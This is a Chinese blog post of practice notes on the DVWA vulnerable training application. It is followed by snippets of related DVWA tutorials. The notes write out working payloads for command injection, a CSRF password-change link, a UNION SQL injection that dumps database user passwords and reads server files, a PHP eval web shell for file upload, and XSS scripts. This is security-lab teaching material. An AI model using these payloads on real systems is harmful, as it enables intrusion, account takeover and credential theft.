dvwa实战笔录

最新推荐文章于 2022-03-12 13:01:36 发布
最新推荐文章于 2022-03-12 13:01:36 发布
阅读量748 收藏
点赞数
分类专栏: 测试
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/leiyanglove/article/details/46550793
版权
一、“Command Execution Vulnerability”-“命令注入漏洞”
127.0.0.1&&net user


二、“Cross Site Request Forgery”-“跨站请求伪造”
在空白的浏览器地址栏中输入以下RUL:
http://192.168.44.130/vulnerabilities/csrf/?password_new=password&password_conf=password&Change=Change,
输入完成后我们可以看到,窗口提示密码修改成功。这时密码已经修改为:password。
通过电子邮件/聊天软件发送你精心构造的URL,可以直接修改当前用户的配置


三、SQL注入
1、检测漏洞是否存在,可以使用order by语句
http://127.0.0.1/dvwa/vulnerabilities/sqli/?id=1' order by 2 +--+&Submit=Submit
‘2’为猜想的字段个数


2、确定字段个数
select id=1 ' order by 2
select * from users union select 1,2,3,4,5,6;


3、显示输出位置
union select 1,2 
http://127.0.0.1/dvwa/vulnerabilities/sqli/?id=1' union select 1,2 +--+&Submit=Submit


4、通过这些显示位置来输出我们想要的信息
http://127.0.0.1/dvwa/vulnerabilities/sqli/?id=1' union select 1,concat_ws(char(32,58,32),user(),database(),version()) +--+&Submit=Submit


5、我们也可能通过显示schemata表,来得到当前数据库中的所有表。
URL: http://127.0.0.1/dvwa/vulnerabilities/sqli/?id=1' union select 1,schema_name from information_schema.schemata +--+&Submit=Submit 


6、 显示数据库当前用户名和密码:concat(user,':',password)from mysql.user 
URL:http://127.0.0.1/dvwa/vulnerabilities/sqli/?id=1' union  select  1,concat(user,':',password)from mysql.user+--+&Submit=Submit 


7、  显示某目录下的文件内容:load_file(‘/etc/gdm/failsafeBlacklist’)
URL:http://127.0.0.1/dvwa/vulnerabilities/sqli/?id=1' union  select  1,load_file(‘/etc/gdm/failsafeBlacklist’) +--+&Submit=Submit


8、  上传文件:<?php @eval($_POST['123']);?> into outfile




四、“File Upload”-“文件上传漏洞”
1、上传有以下内容的PHP文件:
<?php @eval($_POST['123']);?>
2、打开“中国菜刀”-添加如下
URL:http://127.0.0.1/dvwa/hackable/uploads/bb(自己上传的木马文件).php
-文件管理,可以直接管理文件系统。




五、XSS攻击
1、“Reflected Cross Site Scripting (XSS)”-“反射型跨站脚本攻击”
<script>alert(/XXX/)</script>
2、“Stored Cross Site Scripting (XSS)”-“存储型跨站脚本攻击”
在提交的文本框中输入“<script>alert(/XXX/)</script>”,提交成功后,以后只要访问该页面就会弹出对话框。


雷小扬
关注
专栏目录
DVWA靶场通关实战
qaq517384的博客
11-28 2437
Brute Force Command Injection CSRF File Inclusion File Upload Insecure CAPTCHA SQL Injection SQL Injection Weak Session IDs XSS (DOM) XSS(Reflected) XSS(Stored) CSP Bypass JavaScript
手把手教你DVWA实战
qq_41620273的博客
12-25 1765
DVWA 实战: 暴力破解: LOW: 暴力破解即使用穷举法获取所需内容 1.手工破解 步骤: a.确认破解工作(键盘输入用户名 键盘输入密码,鼠标点击login) b.确认破解范围:(用户名字典:admin, root等;密码字典:abc123,password等) c.开始暴力破解: 对应代码思路: for(用户名 in 用户名字典) //破解范围 for(密码 in 密码字典){ 输入用户名;输入密码;点击login按钮; //破解动作 if 'username and/or pass
DVWA实战
萍水间人的小天地
02-16 259
写在前面 Brute Force 之前虽然早早地搭建好了DVWA这个漏洞平台, 但是却一直没有拿来做些什么。 今天挑了一道爆破题目, 然后解决了一点小问题 不代理地址 之前还一直没弄明白为什么Burp 不能抓到 本地发送的包。 原来是最后的那个不代理地址没有删掉。 Low 代码如下: <?php if(isset($_GET['Login'])){ //Ge...
dvwa实战第一篇:brute force
爱未央的博客
04-25 367
爆破密码brute force 与 burpsuite 昨天经过千辛万苦,终于完成了dvwa实验平台的搭建,今天开始正式学习。 首先第一个就是brute force。 配置好Firefox的代理访问: 以及burp suite的proxy设置: 完成后,在intercept中打开拦截开关:intercept is on。在brute force中输入任意的账户与密码,burp suite就会...
实战DVWA
weixin_30647065的博客
06-27 113
DVWA漏洞训练系统,来个大图^-^ 1.首先试了下DVWA的命令执行漏洞command execution 这是我在Low级别上测试的,另外附上low级别代码: <?php if(isset($_POST['submit'])){     //isset()函数,若变量不为NULL或空则返回true$tar...
web安全-dvwa实战
最新发布
07-05
本文档旨在提供DVWA靶场的攻略和实践技巧,帮助用户更好地理解和应对Web应用程序漏洞,其主要分类为 1。DVWA部署暴力破解:介绍如何使用DVWA模拟暴力破解攻击,即通过尝试大量的用户名和密码组合来尝试登录系统,以...
sql注入学习笔记-dvwa实战
xuqide77的博客
03-12 591
目录一、sql注入基础二、sql注入之union注入实战-dvwa1.先判断是数字型还是字符型2.使用order by查询出表的字段数量3.利用联合注入查询数据库名称、表、字段、字段数据 一、sql注入基础 sql注入就是指Web应用程序对用户输入数据的合法性没有判断,前端传入后端的参数是攻击可控的,并且参数带入数据库查询,攻击者可以通过构造不同的sql语句来实现对数据库的任意操作。 sql注入漏洞的产生需要满足两个条件 (1)参数用户可控:前端传给后端的参数内容是用户可以控制的 (2)参数带入数据库查询:
「SQLMap」SQLMap DVWA实战
Black coder
10-26 653
SQLMap 注入 DVWA实战
通过DVWA学习DOM型XSS
Mi1k7ea
01-02 4069
下了个新版的DVWA看了下,发现新增了好几个Web漏洞类型,就玩一下顺便做下笔记,完善一下之前那篇很水的DOM XSS文章,虽然这个也很水 :) 基本概念 DOM,全称Document Object Model,是一个平台和语言都中立的接口,可以使程序和脚本能够动态访问和更新文档的内容、结构以及样式。 DOM型XSS其实是一种特殊类型的反射型XSS,它是基于DOM文档对象模型的一种漏洞,其触...
DVWA实战篇- Brute Force(暴力破解)源码到实战
weixin_58660073的博客
06-04 521
DVWA实战篇- Brute Force Brute Force 漏洞介绍 暴力破解或称为穷举法,是一种针对于密码的破译方法,即将密码进行逐个推算直到找出真正的密码为止。例如一个已知是四位并且全部由数字组成的密码,其可能共有10000种组合,因此最多尝试10000次就能找到正确的密码。理论上利用这种方法可以破解任何一种密码,问题只在于如何缩短试误时间。有些人运用计算机来增加效率,有些人辅以字典来缩小密码组合的范围。 漏洞场景 1.WEB应用的登录界面,应用所在的网络环境里没有部署流量清洗设备 2
Web漏洞实战教程(DVWA的使用和漏洞分析)
10-30
1. WINDOWS环境准备 4 1.1 IIS安装 5 1.2 PHP安装 6 1.3 MYSQL服务器安装 14 1.4 DVWA安装 21 2. LINUX环境准备 25 3. 实战演练 25 3.1 实验须知 25 3.2 COMMAND EXECUTION VULNERABILITY 27 3.2.1 漏洞介绍 27 3.2.2 攻击实战 27 3.2.3 PHP源
DVWA-安全测试靶场.zip
02-19
Web应用程序(DVWA)是一个PHP / MySQL的Web应用程序,它是该死的脆弱。 它的主要目标是成为一名安全专家援助法律环境中测试他们的技能和工具,帮助web开发人员更好地理解的过程确保web应用程序和帮助学生和老师了解web应用程序安全性控制教室环境。 DVWA的目的是 实践中一些最常见的web漏洞 , 不同程度的困难 ,用一个简单直观的界面。 一般的用法说明 它取决于用户如何DVWA方法。 要么通过每个模块工作在一个固定的水平,或选择任何模块和工作达到最高水平之前他们可以移动到下一个。 没有一个固定的对象完成一个模块; 但是用户觉得他们应该成功地利用了系统尽他们可能会利用这个漏洞。 请注意,有 记录和无证的弱点 用这个软件。 这是故意的。 你被鼓励尝试和发现尽可能多的问题。 DVWA还包括一个Web应用程序防火墙(WAF) PHPIDS,可以使在任何阶段进一步增加了困难。 这将演示如何添加另一层的安全可能会阻止某些恶意行为。 注意,还有各种各样的公共方法绕过这些保护(这可以被看作是一个扩展为更高级的用户)! 有一个帮助按钮在每个页面的底部,它允许您查看提示和技巧的脆弱性。 还有额外的链接进一步背景阅读,这涉及到安全问题。
DVWA实战测试之XSS
0xdawn的博客
08-08 975
0x01 XSS(Reflected) Low 源码分析 <?php header ("X-XSS-Protection: 0"); // Is there any input? if( array_key_exists( "name", $_GET ) && $_GET[ 'name' ] != NULL ) { // Feedback for end user...
渗透测试漏洞平台DVWA环境安装搭建及初级SQL注入
追风筝的孩子
08-13 5610
一:简介       DVWA(Damn Vulnerable Web Application)是一个用来进行安全脆弱性鉴定的PHP/MySQL Web应用,旨在为安全专业人员测试自己的专业技能和工具提供合法的环境,帮助web开发者更好的理解web应用安全防范的过程。  一共有十个模块:       暴力(破解)、命令行注入、跨站请求伪造、文件包含、文件上传、不安全的验证码、SQL注入、SQ...
DVWA-命令注入
AI_SumSky的博客
11-26 707
命令注入 low级别 分析源码发现对输入的数据没有做任何处理只是看你点击提交没有和判断你输入的是window还是unix的ping命令所以可以直接用通道符|,||,&,&&来附加命令获取信息 I只获取命令2的返回结果 medium级别 分析页面源码发现对&&和;符号做了黑名单,这里需要注意的是”&&”与” &”的区别: Command 1&&Command 2 先执行Command 1,执行成功后执行Command 2,否则
DVWA--upload
weixin_30385925的博客
05-21 238
文件上传漏洞 0x01了解文件上传漏洞的用处是用来干什么的 什么是文件上传漏洞? 文件上传漏洞是指由于程序员在对用户文件上传部分的控制不足或者处理缺陷,而导致的用户可以越过其本身权限向服务器上上传可执行的动态脚本文件。这里上传的文件可以是木马,病毒,恶意脚本或者WebShell等。这种攻击方式是最为直接和有效的,“文件上传”本身没有问题,有问题的是文件上传后,服务器怎么处理、解释文件...
DVWA搭建
per_se_veran_ce的博客
07-17 421
DVWA搭建 DVWA是干什么的? DVWA是一个学习Web漏洞的很好的工具,一个基于PHP/MYSQL环境写的一个web应用。目的在于帮助安全专业人员在法律环境中测试他们的技能和工具,更好的了解保护Web应用程序。 DVWA有十个模块: Brute Force(暴力(破解)) Command Injection(命令行注入) CSRF(跨站请求伪造) File Inclusion(文件包含) F...
DVWA简介
热门推荐
live4dream的博客
10-26 4万+
DVWA是一个web安全学习靶场,集成了OWASP Top10的漏洞,用于web安全初学者练习web渗透技巧。
DVWA 介绍与安装
angry_program的博客
01-27 532
前言 DVWA(Damn Vulnerable Web Application)是一个用来进行安全脆弱性鉴定的PHP/MySQL Web应用,旨在为安全专业人员测试自己的专业技能和工具提供合法的环境,帮助web开发者更好的理解web应用安全防范的过程。 分类 DVWA共有十个模块,分别是: SQL Injection(SQL注入) SQL Injection(Blind)(SQ...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值